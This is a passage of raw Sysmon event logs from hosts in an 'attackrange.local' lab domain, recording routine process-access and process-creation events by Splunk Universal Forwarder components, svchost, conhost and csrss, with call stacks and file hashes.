Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805905Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.776{0C1E0330-F29C-60EB-3579-00000000D001}3120C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000805904Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.385{0C1E0330-F29C-60EB-3479-00000000D001}520868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805903Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.244{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F29C-60EB-3479-00000000D001}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805902Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.244{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805901Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.244{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805900Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.244{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805899Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.244{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805898Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.244{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805897Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.229{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805896Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.229{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805895Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.229{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805894Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.229{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805893Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.229{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F29C-60EB-3479-00000000D001}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805892Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.229{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F29C-60EB-3479-00000000D001}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805891Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.230{0C1E0330-F29C-60EB-3479-00000000D001}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045751Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:25.944{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BBB617AA2DDC13B42D03DFE664CE410,SHA256=64CA713F3986D63CAA606AFECBCC85E296D7A14FBAEB28FC8049B39D0BF3F526,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000805935Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.651{0C1E0330-F29D-60EB-3679-00000000D001}25563908C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805934Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.479{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F29D-60EB-3679-00000000D001}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805933Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.479{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805932Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.479{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805931Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.479{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805930Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.479{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805929Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.479{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805928Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.479{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805927Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.479{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805926Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.479{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805925Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.463{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\S